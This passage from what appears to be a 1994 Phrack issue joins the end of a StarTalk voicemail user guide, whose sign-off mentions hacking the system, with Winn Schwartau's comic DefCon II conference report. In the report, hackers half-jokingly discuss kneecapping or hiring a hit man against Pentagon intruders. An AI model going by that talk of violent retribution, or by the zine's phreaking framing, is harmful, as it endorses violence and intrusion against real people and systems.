  13901. Play time and date stamp    : 7
  13902. Save a Message              : 7 7
  13903. Erase the message           : 8
  13904. Reply to the message        : 9
  13905. Volume control              : *
  13906.  
  13907. Note: After listening to the messages left in your mailbox and exiting
  13908.       StarTalk, all messages you do not erase are automatically saved.
  13909.  
  13910.  
  13911. Off-premise Message Notification
  13912. --------------------------------
  13913. Off-premise Message Notification, to a telephone number or a pager, alerts
  13914. you when messages are left in your mailbox.  Off-premise Message Notification
  13915. is enabled in the StarTalk Class of Service designation by the System
  13916. Coordinator.
  13917.  
  13918. Setting Up Off-premise Message Notification
  13919. -------------------------------------------
  13920. To set up Off-premise Message Notification, you must first open your
  13921. mailbox.  Once you have opened your mailbox:
  13922.  
  13923. 1.  Open the mailbox admin menu, press 8
  13924. 2.  Open the message notification menu, press 6
  13925. 3.  To set up message notification, press 1
  13926. 4.  To select a line, press 1
  13927.     Note:  You can also select line, pool or intercom.
  13928.     (YOU HAVE TO SELECT LINE)
  13929. 5.  Enter a line, pool or IC number, press #
  13930.     Note:  You have to enter '1', or '01' as the line if 1 doesn't work.
  13931. 6.  To accept the line, pool or IC number, press #
  13932. 7.  Enter the destination telephone number, press #
  13933.     Note:  While you are entering a telephone number, you can press a dialpad
  13934.     number to represent dialtone recognition or other telephone number options.
  13935.     When StarTalk is installed with PBX or Centrex and you want to access an
  13936.     outside line, you must enter the command to recognize dial tone.  For
  13937.     example enter 9 to access an outside line, press # then enter 4 to
  13938.     recognize dialtone press 2 followed by the destination number, press #
  13939.     and any required pauses.   Each pause entered is four seconds long.
  13940. 8.  To end the telephone number, press #
  13941. 9.  To accept the telephone number, press #
  13942. 10. To accept the destination type telephone, press # and move to step 12.
  13943.     To change the destination type to pager, press 1
  13944.     Note: The destination type can be either telephone or pager.  StarTalk
  13945.     automatically selects telephone.  When the pager destination
  13946.     type is selected, a pause must be inserted.  The number of pauses
  13947.     required depends on the pager system being used.
  13948. 11. To accept the destination type, press #
  13949.     If the message destination type is a telephone, you must set a start time.
  13950. 12. Enter the time when Off-premise Message Notification is to start.
  13951.     Note: This is a four-digit field.  Any single digit hour and minute
  13952.     must be preceded by a zero.
  13953. 13. Press 1 for AM, 2 for PM.
  13954. 14. To accept the start time, press #
  13955. 15. Enter the time when Off-premise Message Notification is to stop.
  13956.     Note : This is a four-digit field.  Any single digit hour and
  13957.     minute must be preceded by a zero.
  13958. 16. Press 1 for AM, 2 for PM.
  13959. 17. To accept the stop time, press #
  13960. 18. To accept the message type NEW, press #
  13961.     To change the message type to URGENT, press 1
  13962.     Note: The default message type is NEW. This means you are notified
  13963.     whenever you receive a new message.  Changing the message type changes
  13964.     NEW to URGENT.  This means you are only notified when you receive an
  13965.     urgent message.
  13966. 19. To accept the message type, press #
  13967.  
  13968. The Off-premise Message Notification will begin as soon as the start time
  13969. is reached.  You will be called whenever you receive a message.
  13970.  
  13971.  
  13972. Disabling Off-premise Message Notification
  13973. ------------------------------------------
  13974. To disable Off-premise Message Notification, you must first open your
  13975. mailbox, Once your mailbox is open:
  13976.  
  13977. 1. Open the mailbox admin menu, press 8
  13978. 2. To access the message notification menu, press 6
  13979. 3. To listen to the options, press 2
  13980. 4. To disable message notification, press 1
  13981.  
  13982. Off-premise Message Notification is disabled.
  13983.  
  13984. Changing Off-premise Message Notification
  13985. -----------------------------------------
  13986. To change Off-premise Message Notification, you must first open your mailbox,
  13987. Once you have opened your mailbox:
  13988.  
  13989. 1.  Open the mailbox admin menu, press 8
  13990. 2.  Open the message notification menu, press 6
  13991. 3.  To change message notification press 1
  13992. 4.  To select a line, press 1
  13993. 5.  Press 1
  13994.     If you wish to change the line, press #
  13995. 6.  Enter the new line number.
  13996. 7.  To end the line number, press #
  13997. 8.  To accept the line number, press #
  13998. 9.  Press 1
  13999.     If you do not wish to change the destination telephone number, press #
  14000. 10. Enter the new destination telephone number.
  14001. 11. To end the telephone number, press #
  14002. 12. To accept the telephone number, press #
  14003. 13. To change the destination type, press 1
  14004. 14. To accept the destination type, press #
  14005. 15. To change the start time, press 1
  14006.     If you do not wish to change the time, press #
  14007. 16. Enter the time when Off-premise Message Notification is to start.
  14008. 17. Press 1 for AM, 2 for PM.
  14009. 18. To accept the start time, press #
  14010. 19. To change the stop time, press 1
  14011.     If you do not wish to change the time, press #
  14012. 20. Enter the time when Off-premise Message Notification is to stop.
  14013. 21. Press 1 for AM, 2 for PM.
  14014. 22. To accept the stop time, press #
  14015. 23. To change the message type, press 1
  14016. 24. To accept the message type, press #
  14017.  
  14018. Leaving a Mailbox Message
  14019. -------------------------
  14020. You can leave a message directly in any StarTalk mailbox, as long as that
  14021. mailbox has been initialized.
  14022.  
  14023. To leave a mailbox message:
  14024.  
  14025. 1. Enter the mailbox # and at the tone, record your message.
  14026. 2. To end your recording, press #
  14027. 3. For delivery options, press 3
  14028. 4. To send your message, press #
  14029.  
  14030. Message Delivery Options
  14031. ------------------------
  14032. StarTalk provides you with four message delivery options, which are:
  14033.  
  14034. Certified 1 - This delivery option sends you a message and tells you if
  14035.               the person received and read your message, but this is
  14036.               only if the message is inside the system.
  14037.  
  14038. Urgent    2 - This delivery option marks the message, and plays it before
  14039.               playing other messages left in your mailbox.
  14040.  
  14041. Private   3 - This delivery option prevents a message from being forwarded
  14042.               to another mailbox.
  14043.  
  14044. Normal    # - This delivery option sends a message to a mailbox.  Normal
  14045.               messages are played in the order in which they are received,
  14046.               and can be forwarded to other mailboxes.
  14047.  
  14048. After you have recorded your mailbox message, press 3 to access delivery
  14049. options.  To use one of the delivery options, press the right delivery
  14050. option number.
  14051.  
  14052. Note: When leaving a message, you can press 9 to listen to StarTalk voice
  14053.       prompts in the alternate language.
  14054.  
  14055. Assigning the Target Attendant
  14056. ------------------------------
  14057. Anyone that presses [0] when they are connected to your box will be
  14058. transferred  to an operator if your Target Attendant is set to [0] or her
  14059. mailbox #.
  14060.  
  14061. To change from the Operator to the Target Attendant -
  14062.  
  14063. 1. Press 8
  14064. 2. Press 5
  14065. 3. Press 1
  14066. 4. Enter <desired extension>
  14067. 5. Press *
  14068.  
  14069. Quick Reference Tips
  14070. --------------------
  14071.  
  14072.  - To save time, you can just interrupt most prompts by press # or selecting
  14073.    a StarTalk option.
  14074.  
  14075.  - If you get lost using StarTalk options, press * to replay the option list
  14076.  
  14077.  ```````````````````````````````````````````````````````````````````````````
  14078.  Ok, this is the end of the StarTalk voice mail guide.  I tried my best
  14079.  to make it as simple as I could with respect to both hacking it
  14080.  and using it.  I plan on writing my next file on Smooth Operator, a
  14081.  PC-based information processing system.  I will probably focus more on
  14082.  the terminal part of it.  I will try and cover the logins and all other
  14083.  things needed to get around the system.  If any readers out there have
  14084.  comments or suggestions on this article, or on my next article, please
  14085.  contact me.
  14086.  
  14087.  If you would like to talk about this, you can find me on IRC with the nick
  14088.  'redskull' or you can write me a message on my Internet Address.
  14089.  Internet Address : redskull@io.org
  14090.  
  14091.  I'd like to thank S. Cleft for giving me some tips and also discovering
  14092.  some of the things I've mentioned in this file.
  14093.  
  14094.  ````````````````````````````````````````````````````````````````````````````                              ==Phrack Magazine==
  14095.  
  14096.                  Volume Five, Issue Forty-Six, File 19 of 28
  14097.  
  14098. ****************************************************************************
  14099.  
  14100.                       DefCon II: Las Vegas
  14101.  
  14102.                   Cyber-Christ meets Lady Luck
  14103.  
  14104.                         July 22-24, 1994
  14105.  
  14106.                         by Winn Schwartau
  14107.                          (C) 1994
  14108.          
  14109.  
  14110. Las  Vegas connotes radically different images to radically  dif
  14111. ferent  folks.   The Rat Pack of Sinatra, Dean Martin  and  Sammy 
  14112. Davis  Jr.  elicits up the glistening self-indulgent  imagery  of  
  14113. Vegas'   neon  organized  crime in the  '50's   (Ocean's  Eleven 
  14114. displayed only minor hacking skills.)
  14115.  
  14116. Then  there's the daily bus loads of elderly nickel  slot  gam
  14117. blers from Los Angeles and Palm Springs who have nothing  better 
  14118. to  do  for twenty out of twenty four hours each  day.   (Their 
  14119. dead  husbands were golf hacks.)   Midwesterners  now  throng to 
  14120. the Mississippi River for cheap gambling.
  14121.  
  14122. Recreational vehicles of semi-trailor length from East  Bullock, 
  14123. Montana  and  Euclid, Oklahoma and Benign, Ohio clog  routes  80 
  14124. and 40 and 10 to descend with a vengeance upon an asphalt  home 
  14125. away  from home in the parking lot of Circus Circus.  By  cul
  14126. tural demand, every Rv'er worth his salt must, at least once in 
  14127. his life,  indulge in the depravity of Glitter Gulch.  
  14128.  
  14129. And  so they come, compelled by the invisibly insidious  derelict 
  14130. attraction  of a desert Mecca whose only purpose in life  is  to 
  14131. suck  the  available  cash from  addicted  visitor's  electronic 
  14132. purses of ATM and VISA cards. (Hacker?  Nah . . .)
  14133.  
  14134. Vegas  also has the distinction of being home to the largest  of 
  14135. the largest conventions and exhibitions in the world.   Comdex 
  14136. is the world's largest computer convention where 150,000  techno-
  14137. dweebs  and  silk  suited glib  techno-marketers  display  their 
  14138. wares  to a public who is still paying off  the 20% per  annum 
  14139. debt  on last year's greatest new electronic gismo which  is 
  14140. now rendered thoroughly obsolete.  And the Vegas Consumer  Elec
  14141. tronic  Show does for consumer electronics what the First  Amend
  14142. ment does for pornography.  (Hackers, are we getting close?)
  14143.  
  14144. In between, hundreds upon hundreds of small conferences and 
  14145. conventions  and sales meetings and annual excuses  for  excess 
  14146. all  select Las Vegas as the ultimate host city.  Whatever  you 
  14147. want, no matter how decadent, blasphemous, illegal or immoral, at 
  14148. any  hour, is yours for the asking, if you have cash or a  clean 
  14149. piece of plastic.  
  14150.  
  14151. So, it comes as no surprise, that sooner or later, (and it turns 
  14152. out to be sooner) that the hackers of the world, the computer 
  14153. hackers, phone phreaks, cyber-spooks, Information Warriors, data 
  14154. bankers, Cyber-punks, Cypher-punks, eavesdroppers, chippers, 
  14155. virus  writers  and  perhaps the occasional  Cyber  Christ  again 
  14156. picked Las Vegas as the 1994 site for DefCon II. 
  14157.  
  14158. You see, hackers are like everyone else (sort of) and so they, 
  14159. too, decided that their community was also entitled to hold 
  14160. conferences and conventions.
  14161.  
  14162. DefCon  (as opposed to Xmas's HoHoCon), is the  premier  mid-year 
  14163. hacker extravaganza.  Indulgence gone wild, Vegas notwithstanding 
  14164. if  previous Cons are any example; but now put a  few  hundred 
  14165. techno-anarchists  together in sin city USA, stir  in  liberal 
  14166. doses  of  illicit controlled pharmaceutical substances, and  we 
  14167. have a party that Hunter Thompson would be proud to attend.
  14168.  
  14169. All  the while, as this anarchistic renegade regiment marches  to 
  14170. the tune of a 24 hour city, they are under complete  surveillance 
  14171. of  the authorities.  Authorities like the FBI, the Secret  Serv
  14172. ice,  telephone security . . . maybe even Interpol.  And how  did 
  14173. the  "man"  arrive in tow behind the techno-slovens  that  belong 
  14174. behind bars?
  14175.  
  14176. They were invited.
  14177.  
  14178. And so was I.  Invited to speak. (Loose translation for standing 
  14179. up  in front of hundreds of hackers and being verbally  skewered 
  14180. for having an opinion not in 100% accordance with their own.)   
  14181.  
  14182. "C'mon,  it'll be fun," I was assured by DefCon's organizer,  the 
  14183. Dark Tangent.
  14184.  
  14185. "Sure  fired way to become mutilated monkey meat,"  I  responded.  
  14186. Some  hackers just can't take a joke, especially after  a  prison 
  14187. sentence and no opposite-sex sex.
  14188.  
  14189. "No really, they want to talk to you . . ."
  14190.  
  14191. "I bet."
  14192.  
  14193. It's  not that I dislike hackers - on the contrary.  I have  even 
  14194. let a few into my home to play with my kids.  It's just that,  so 
  14195. many  of the antics that hackers have precipitated at  other Cons 
  14196. have  earned them a reputation of disdain by all, save those  who 
  14197. remember  their own non-technical adolescent shenanigans.  And  I 
  14198. guess I'm no different.  I've heard the tales of depraved  indif
  14199. ference,  hotel  hold-ups, government raids on folks  with  names 
  14200. similar to those who are wanted for pushing the wrong key on  the 
  14201. keyboard and getting caught for it.  I wanted to see teens and X-
  14202. generation types with their eyes so star sapphire glazed over that 
  14203. I could trade them for chips at the craps table.   
  14204.  
  14205. Does  the truth live up to the fiction?  God, I hope so. It'd  be 
  14206. downright  awful and unAmerican if 500 crazed hackers didn't  get 
  14207. into at least some serious trouble.  
  14208.  
  14209. So I go to Vegas because, because, well, it's gonna be fun.  And, 
  14210. if I'm lucky, I might even see an alien spaceship.  
  14211.  
  14212. For you see, the party has already begun.
  14213.  
  14214.  
  14215. I  go to about 30 conventions and conferences a year, but  rarely 
  14216. if ever am I so Tylonol and Aphrin dosed that I decide to go with 
  14217. a severe head cold.  Sympomatic relief notwithstanding I  debated 
  14218. and  debated, and since my entire family was down with  the  same 
  14219. ailment  I figured Vegas was as good a place to be as at home  in 
  14220. bed.   If  I could survive the four and half  hour  plane  flight 
  14221. without  my  Eustahian tubes rocketing through my ear  drums  and 
  14222. causing  irreparable damage, I had it made.
  14223.  
  14224. The  flight was made tolerable becuase I scuba dive.   Every  few 
  14225. minutes I drowned out the drone of the engines by honking  uncon
  14226. trollably  like  Felix  Ungerto without his  aspirator.   To  the 
  14227. chagrin of my outspoken counter surveillance expert and traveling 
  14228. mate,  Mike  Peros and the rest of the first  class  cabin,   the 
  14229. captain reluctantly allowed be to remain on the flight and not be 
  14230. expelled sans parachute somewhere over Southfork, Texas.   Snort, 
  14231. snort.  Due to extensive flirting with the two ladies across  the 
  14232. aisle, we made the two thousand mile trek in something less  than 
  14233. 34  minutes . . . or so it seemed.  Time flies took on new  mean
  14234. ing. 
  14235.  
  14236. For  those who don't know, the Sahara Hotel is the dregs  of  the 
  14237. Strip.   We were not destined for Caesar's or the MGM or  any  of 
  14238. the  new multi-gazillion dollar hotel cum casinos  which  produce 
  14239. pedestrian  stopping  extravaganzas as an inducement to  suck  in 
  14240. little old ladies to pour endless rolls of Washington quarters in 
  14241. mechanical  bottomless pits. The Sahara was built some 200  years 
  14242. ago  by native slave labor whose idea of plumbing is  clean  sand 
  14243. and  decorators  more concerned with a mention in Mud  Hut  Daily 
  14244. than Architectural Digest.  It was just as depressingly dingy and 
  14245. solicitly low class as it was when I forced to spend eleven  days 
  14246. there (also with a killer case of the flu) for an extended Comdex 
  14247. computer show.  But, hey, for a hacker show, it was top flight.  
  14248.  
  14249. "What hackers?" The desk clerk said when I asked about the show.
  14250.  
  14251. I explained.  Computer hackers: the best from all over the  coun
  14252. try.  "I hear even Cyber Christ himself might appear."
  14253.  
  14254. Her  quizzical  look emphasized her pause.  Better  to  ignore  a 
  14255. question   not understood than to look stupid.  "Oh,  they'll  be 
  14256. fine,  We have excellent security."  The security people, I found 
  14257. out  shortly thereafter knew even less: "What's a  hacker?"   Too 
  14258. much  desert sun takes its toll.  Proof positive photons are  bad 
  14259. for neurons.  
  14260.  
  14261. Since it was still only 9PM Mike and I sucked down a couple of $1 
  14262. Heinekens in the casino and fought it out with Lineman's  Switch
  14263. ing  Union representatives who were also having their  convention 
  14264. at the Sahara.  Good taste in hotels goes a long way.  
  14265.  
  14266. "$70,000  a  year to turn a light from red to  green?"   we  com
  14267. plained.
  14268.  
  14269. "It's a tension filled job . . .and the overtime is murder."
  14270.  
  14271. "Why a union?"
  14272.  
  14273. "To protect our rights."
  14274.  
  14275. "What rights?"
  14276.  
  14277. "To make sure we don't get replaced by a computer . . ."
  14278.  
  14279. "Yeah,"   I  agreed.   "That  would  be  sad.   No  more   Amtrak 
  14280. disasters."  The crowd got ugly so we made a hasty retreat  under 
  14281. the scrutiny of casino security to our rooms. Saved.
  14282.  
  14283. Perhaps  if  I  noticed or had read the  original  propaganda  on 
  14284. DefCon, I might have known that nothing significant was going  to 
  14285. take  place  until the following (Friday) evening  I  might  have 
  14286. missed all the fun.
  14287.  
  14288. For  at around 8AM, my congestion filled cavities  and  throbbing 
  14289. head was awakened by the sound of an exploding toilet.  It's kind 
  14290. of  hard  to  explain what this sounds like.   Imagine  a  toilet 
  14291. flushing  through  a  three megawatt sound system  at  a  Rolling 
  14292. Stones concert. Add to that the sound of a hundred thousand   flu 
  14293. victims standing in an echo chamber cleansng their sinuses into a 
  14294. mountain  of  Kleenex while three dozen  football  referees  blow 
  14295. their foul whistles in unison, and you still won't come close  to 
  14296. the  sheer cacophonous volume that my Saharan toilet exuded  from 
  14297. within its bowels.  And all for my benefit.  
  14298.  
  14299. The  hotel  manager  thought I was kidding.  "What  do  you  mean 
  14300. exploded?"
  14301.  
  14302. "Which word do you not understand?" I growled in my early morning 
  14303. sub-sonic voice.  "If you don't care, I don't."  
  14304.  
  14305. My  bed was floating.  Three or maybe 12 inches of water  created 
  14306. the damnedest little tidal wave I'd ever seen, and the sight  and 
  14307. sound  of  Lake Meade in room 1487 only exascerbatd the  pressing 
  14308. need to relieve myself.  I dried my feet on the extra bed linens, 
  14309. worried  about electrocution and fell back asleep. It could  have 
  14310. been  3  minutes or three hours later - I have no way to  know  -  
  14311. but  my hypnogoic state was rudely interrupted by  hotel  mainte
  14312. nance pounding at the door with three fully operational  muffler-
  14313. less jack hammers.
  14314.  
  14315. "I  can't  open  it," I bellowed over the continual  roar  of  my 
  14316. personal  Vesuvius Waterfall.  "Just c'mon in."   The  fourteenth 
  14317. floor hallway had to resemble an underwater coral display becuase 
  14318. the door opened ever so slowly..
  14319.  
  14320. "Holy Christ!"  
  14321.  
  14322. Choking  back  what would have been a painful laugh,  I  somehow 
  14323. eeked out the words, with  a smirk, "Now you know what an explo-
  14324. ding  toilet  is like."
  14325.  
  14326. For,  I  swear, the next two hours three men  whose  English  was 
  14327. worse  than a dead Armadillo attempted to suck up the Nile  River 
  14328. from my room and the hallway.  Until that very moment in time,  I 
  14329. didn't  know  that  hotels were outfitted  with  vacuum  cleaners 
  14330. specifically designed to vacuum water.  Perhaps this is a regular 
  14331. event.
  14332.  
  14333.  
  14334. Everyone  who has ever suffered through one bitches  about  Vegas 
  14335. buffets,  and  even the hackers steered away  from  the  Sahara's  
  14336. $1.95  "all you can eat" room: "The Sahara's buffet is the  worst 
  14337. in  town;  worse than Circus Circus."  But since I  had  left  my 
  14338. taste  buds  at 37,000 feet along with schrapneled pieces  of  my 
  14339. inner ear, I sought out sustenance only to keep me alive  another 
  14340. 24 hours.
  14341.  
  14342. By mid afternoon, I had convinced myself that outside was not the 
  14343. place  to be. After only eighteen minutes of  120  sidewalk  egg-
  14344. cooking  degrees, the hot desert winds took what was left  of  my 
  14345. breath  away  and with no functioning airways as it was,  I  knew 
  14346. this  was  a big mistake.  So, hacker convention, ready  or  not, 
  14347. here I come.
  14348.  
  14349. Now,  you  have to keep in mind that Las Vegas  floor  plans  are 
  14350. designed  with  a singular purpose in mind. No matter  where  you 
  14351. need to go, from Point A to Point B or Point C or D or  anywhere, 
  14352. the traffic control regulations mandated by the local police  and 
  14353. banks require that you walk by a minimum of 4,350 slot  machines, 
  14354. 187  gaming  tables of various persuasions and no  less  than  17 
  14355. bars.  Have they no remorse?  Madison Avenue ad execs take heed! 
  14356.  
  14357. So, lest I spend the next 40 years of my life in circular pursuit 
  14358. of  a  sign-less hacker convention losing every last  farthing  I 
  14359. inherited from dead Englishmen, I asked for the well hidden loca-
  14360. tion at the hotel lobby.
  14361.  
  14362. "What  hackers?"  There goes that nasty photon  triggered  neuron 
  14363. depletion again.
  14364.  
  14365. "The computer hackers."
  14366.  
  14367. "What computer hackers.  We don't have no stinking hackers . . ."  
  14368. Desk clerk humor, my oxymoron for the week.
  14369.  
  14370. I tried the name: DefCon II.
  14371.  
  14372. "Are  we going to war?"  one ex-military Uzi-wielding guard  said 
  14373. recognizing the etymology of the term. 
  14374.  
  14375. "Yesh, it's true"  I used my most convincing tone. "The  Khasaks
  14376. tanis  are coming with nuclear tipped lances riding hundred  foot 
  14377. tall  horses.   Paris has already fallen.  Berlin  is  in  ruins.  
  14378. Aren't you on the list to defend this great land?"
  14379.  
  14380. "Sure as shit am!"   He scampered off to the nearest phone in  an 
  14381. effort  to  be the first on the front lines.   Neuron  deficiency 
  14382. beyong surgical repair..
  14383.  
  14384. I  slithered down umpteen hallways and casino aisles lost in  the 
  14385. jungle of jingling  change.   Where the  hell  are  the  hackers?   
  14386. "They must be there," another neuron-impoverished Saharan employ
  14387. ee said as he pointed towards a set of escalators at the very far 
  14388. end of the casino.  
  14389.  
  14390. All the way at the end of the almost 1/4 mile trek through  Sodom 
  14391. and Gonorrhea an 'up' escalator promised to take me to hackerdom.  
  14392. Saved  at last.  Upstairs.  A conference looking area.  No  signs 
  14393. anywhere,  save  one of those little black  Velcro-like  stick-em 
  14394. signs where you can press on white block letters.
  14395.  
  14396.                    No Mo Feds
  14397.  
  14398. I must be getting close. Aha, a maintenance person; I'll ask him.  
  14399. "What hackers?  What's DefCon."
  14400.  
  14401. Back  downstairs,  through the casino, to the  front  desk,  back 
  14402. through  the casino, up the same escalator again. Room One I  was 
  14403. told.   Room  One  was empty.  Figures.  But, at the  end  of   a 
  14404. hallway,  past the men's room and the phones, and  around  behind 
  14405. Room One I saw what I was looking for: a couple of dozen T-shirt
  14406. ed,  Seattle grunged out kids (read: under 30) sitting at  uncov
  14407. ered  six foot folding tables hawking their DefCon  II  clothing, 
  14408. sucking  on Heinekens and amusing themselves with  widely  strewn 
  14409. backpacks and computers and cell phones.
  14410.  
  14411. I had arrived!
  14412.  
  14413.             * * * *
  14414.  
  14415. You  know,  regular old suit and tie conferences  could  learn  a 
  14416. thing or two from Jeff Moss, the man behind DefCon II.  No  fancy 
  14417. badge making equipment; no $75 per hour union labor built  regis
  14418. tration  desks; no big signs proclaiming the wealth of  knowledge 
  14419. to  be gained by signing up early.  Just a couple of kids with  a 
  14420. sheet of paper and a laptop.  
  14421.  
  14422. It turned out I was expected.  They handed me my badge and what a 
  14423. badge it was.  I'm color blind, but this badge put any psychedel
  14424. ically induced spectral display to shame.  In fact it was a close  
  14425. match  to the Sahara's mid 60's tasteless casino carpeting  which 
  14426. is so chosen as to hide the most disgusting regurgative blessing.  
  14427. But better and classier.
  14428.  
  14429. The neat thing was, you could (in fact had to) fill out your  own 
  14430. badge  once  your name was crossed off the piece  of  paper  that 
  14431. represented the attendee list.  
  14432.  
  14433. Name:
  14434. Subject of Interest:
  14435. E-Mail:
  14436.  
  14437. Fill  it  out  any way you want.  Real name,  fake  name,  alias, 
  14438. handle  - it really doesn't matter cause the  hacker  underground 
  14439. ethic  encourages anonymity.  "We'd rather not know who  you  are 
  14440. anyway, unless you're a Fed.  Are you a Fed?"
  14441.  
  14442. A  couple of lucky hackers wore the ultimate badge of honor.   An 
  14443. "I  Spotted A Fed" T-shirt.  This elite group sat or lay  on  the 
  14444. ground watching and scouring the registration area for signs that 
  14445. someone,  anyone, was a Fed.  They really didn't care or  not  if 
  14446. you  were a Fed - they wanted the free T-shirt and the  peer  re
  14447. spect that it brought.
  14448.  
  14449. I'm over 30 (OK, over 35) and more than a few times (OK, a little 
  14450. over 40) I had to vehemently deny being a Fed.  Finally Jeff Moss 
  14451. came to the rescue.
  14452.  
  14453. "He's not a Fed.  He's a security guy and a writer."
  14454.  
  14455. "Ugh!  That's worse.  Can I get a T-shirt cause he's  a  writer?"  
  14456. No way hacker-breath.
  14457.  
  14458. Jeff.   Jeff Moss. Not what I expected.  I went to school with  a 
  14459. thousand Jeff Mosses.  While I had hair down to my waist, wearing 
  14460. paisley leather fringe jackets and striped bell bottoms so wide I 
  14461. appeared to be standing on two inverted ice cream cones, the Jeff 
  14462. Mosses  of  the world kept  their parents  proud.   Short,  short 
  14463. cropped  hair,  acceented by an ashen pall and  clothes  I  stlll 
  14464. wouldn't  wear  today.  They could get away with  anything  cause 
  14465. they  didn't look the part of radical chic.  Jeff, I really  like 
  14466. Jeff: he doesn't look like what he represents.  Bruce  Edelstein, 
  14467. (now of HP fame) used to work for me.  He was hipper than hip but 
  14468. looked squarer than square.  Now today that doesn't mean as  much 
  14469. as  it used to, but we ex-30-somethings have a hard time  forget
  14470. ting  what rebellion was about. (I was suspended 17 times in  the 
  14471. first semester of 10th grade for wearing jeans.)
  14472.  
  14473. Jeff  would  fit into a Corporate Board Meeting if  he  wore  the 
  14474. right suit and uttered the right eloquencies:  Yes, that's it:  A 
  14475. young  Tom Hanks.  Right.  I used to hate Tom Hanks (Splash,  how 
  14476. fucking stupid except for the TV-picture tube splitting  squeals) 
  14477. but  I've come to respect the hell out of him as an actor.   Jeff 
  14478. never  had to pass through that first phase.  I  instantly  liked 
  14479. him and certainly respect his ability to pull off a full  fledged 
  14480. conference for only $5000.  
  14481.  
  14482. You  read  right. Five grand and off to Vegas with  300  of  your 
  14483. closest personal friends, Feds in tow, for a weekend of electron
  14484. ic  debauchery.   "A few hundred for the brochure, a few  hundred 
  14485. hear, a ton in phone bills, yeah, about $5000 if no one does  any 
  14486. damage."   Big time security shows cost $200,000 and up.   I  can 
  14487. honestly  say  without meaning anything pejorative at any  of  my 
  14488. friends and busienss acquaintances, that I do not learn 40  times 
  14489. as  much  at the 'real' shows.  Something is definitely out of  
  14490. whack  here.  Suits want to see suits.  Suits want to see  fancy.  
  14491. Suits want to see form, substance be damned.  Suits should take a 
  14492. lesson from my friend Jeff.
  14493.  
  14494.             * * * * *
  14495.  
  14496. I again suffered through a tasteless Saharan buffer dinner  which 
  14497. cost me a whopping $7.95.  I hate grits - buttered sand is what I 
  14498. call  them  - but in this case might well have  been  preferable.  
  14499. Somehow  I  coerced a few hackers to join me in  the  ritualistic 
  14500. slaughter of our taste buds and torture of our intestines.   They 
  14501. were  not pleased with my choice of dining, but then who gives  a 
  14502. shit?  I couldn't taste anything anyway.  Tough. 
  14503.  
  14504. To keep our minds off of the food we talked about something much 
  14505. more pleasant: the recent round of attacks on Pentagon  computers 
  14506. and  networks.  "Are the same people involved as in the  sniffing 
  14507. attacks earlier this year?" I asked my triad of dinner mates. 
  14508.  
  14509. "Indubitably."
  14510.  
  14511. "And what's the reaction from the underground - other hackers?"
  14512.  
  14513. Coughs, sniffs.  Derisive visual feedback. Sneers. The finger.
  14514.  
  14515. "We can't stand 'em.  They're making it bad for everybody."   Two 
  14516. fingers.
  14517.  
  14518. By and large the DefCon II hackers are what I call 'good hackers' 
  14519. who hack, and maybe crack some systems upon occasion, but  aren't 
  14520. what  I refer to as Information Warriors in the bad sense of  the 
  14521. word.   This group claimed to extol the same position as most  of 
  14522. the  underground  would:   the Pentagon sniffing  crackers  -  or 
  14523. whoever  who  is assaulting thousands of computers on the  net  - 
  14524. must be stopped. 
  14525.  
  14526. "Scum bags, that what they are."  I asked that they not sugarcoat 
  14527. their feelings on my behalf.  I can take it.  "These fuckers  are 
  14528. beyond belief; they're mean and don't give a shit how much damage 
  14529. they  do."  We played with our food only to indulge in the single 
  14530. most  palatable edible on display: ice cream with gobs of  choco
  14531. late syrup with a side of coffee. . 
  14532.  
  14533. The big question was, what to do?  The authorities are  certainly 
  14534. looking  for a legal response; perhaps another Mitnick or  Phiber 
  14535. Optik.   Much  of  the underground cheered when  Mark  Abene  and 
  14536. others from the reknowned Masters of Destruction went to spend  a 
  14537. vacation  at the expense of the Feds.  The MoD was up to no  good 
  14538. and  despite  Abene's cries that there was no such thing  as  the 
  14539. MoD, he lost and was put away.  However many hackers believe as I 
  14540. do, that sending Phiber to jail for hacking was the wrong punish
  14541. ment.  Jail time won't solve anything nor cure a hacker from  his 
  14542. first  love.   One might as well try to cure a  hungry  man  from 
  14543. eating:   No, Mark did wrong, but sending him to jail was  wrong, 
  14544. too.   The  Feds and local computer cops and the courts have  to   
  14545. come  up with punishments appropriate to the crime.  Cyber-crimes 
  14546. (or cyber-errors) should not be rewarded by a trip to an all male 
  14547. hotel where the favorite toy is a phallically carved bar of soap.
  14548.  
  14549. On  the other hand, hackers in general are so incensed  over  the 
  14550. recent swell of headline grabbing break-ins, and law  enforcement 
  14551. has  thus far appeared to be impotent, ("These guys  are  good.") 
  14552. that many are searching for alternative means of retribution.
  14553.  
  14554. "An IRA style knee capping is in order," said one.
  14555.  
  14556. "That's  not  good enough, not enough pain," chimed  in  another.  
  14557. (Sip, sip. I can almost taste the coffee.)
  14558.  
  14559. "Are  you  guys serious?" I asked.  Violence?  You? I  thought  I 
  14560. knew them better than that. I know a lot of hackers, none that  I 
  14561. know  of  is  violent,  and this  extreme  Pensacola  retribution 
  14562. attitude seemed tottally out of character.  "You really  wouldn't 
  14563. do that, would you?"  My dinner companions were so upset and they 
  14564. claimed to echo the sentiment of all good-hackers in good  stand
  14565. ing, that yes, this was a viable consideration.
  14566.  
  14567. "The Feds aren't doing it, so what choice do we have?  I've heard 
  14568. talk  about  taking up a collection to pay for a hit man .  .  ."  
  14569. Laughter around, but nervous laughter. 
  14570.  
  14571. "You wouldn't. . ." I insisted.
  14572.  
  14573. "Well,  probably  not  us, but that  doesn't  mean  someone  else 
  14574. doesn't won't do it." 
  14575.  
  14576. "So you know who's behind this whole thing."
  14577.  
  14578. "Fucking-A  we do," said yet another hacker chomping at the  bit. 
  14579. He was obviously envisioning himself  with a baseball bat in  his 
  14580. hand.
  14581.  
  14582. "So do the Feds."
  14583.  
  14584. So now I find myself in the dilemma of publishing the open secret 
  14585. of who's behind the Internet sniffing and Pentagon break ins, but 
  14586. after  talking  to people from both the underground and  law  en
  14587. forcement,  I think I'll hold off awhile  It serves no  immediate 
  14588. purpose other than to warn off the offenders, and none of us want 
  14589. that.
  14590.  
  14591. Obviously all is not well in hacker-dom.
  14592.  
  14593.             * * * * *
  14594.  
  14595. The  registration  area  was beyond  full;  computers,  backpacks 
  14596. everywhere,  hundreds  of what I have to refer to as kids  and  a 
  14597. fair number of above ground security people.  Padgett Peterson of 
  14598. Martin  Marietta was going to talk about viruses, Sara Gordon  on 
  14599. privacy, Mark Aldrich is a security guy from DC., and a  bunch of   
  14600. other  folks I see on the seemingly endless security  trade  show 
  14601. circuit. Jeff Moss had marketed himself and the show excellently.  
  14602. Los Angeles sent a TV crew, John Markoff from the New York  Times 
  14603. popped  in as did a writer from Business Week.  (And  of  course, 
